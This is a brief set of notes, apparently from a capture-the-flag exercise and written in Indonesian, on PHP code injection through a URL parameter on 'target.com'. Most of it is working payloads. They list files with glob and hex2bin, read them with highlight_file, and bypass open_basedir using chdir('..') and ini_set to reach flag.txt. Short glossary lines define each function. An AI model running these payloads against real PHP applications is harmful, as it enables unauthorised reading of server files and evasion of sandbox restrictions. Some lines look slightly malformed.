target.com/?python-print_r(glob(hex2bin(hex2bin(3261))));
output : Array ( [0] => index.php[1] => ini_yang_kamu_cari.txt [2])

target.com/?python=highlight_file(glob(hex2bin(hex2bin(3261)))[1];

target.com/?python=chdir($_GET[6]);ini_set($_GET[7],$_GET[8]);chdir($_GET[8]);chdir($_GET[8]);chdir($_GET[8]);chdir($_GET[8]);ini_set($_GET[7],$_GET[9]);echo(highlight_file($_GET[5]));&6=kakaesi&7=open_basedir&8=..&9=/&5=flag.txt

chdir = pindah directori
ini_set = settingan tambahanpada php.ini
echo = menampilkan hasil value
highlight_file = digunakan untuk mengambil file dan menampilkannya dengan mode highlight
open_basedir = membuka base directory (dalam linux biasanya di '/')

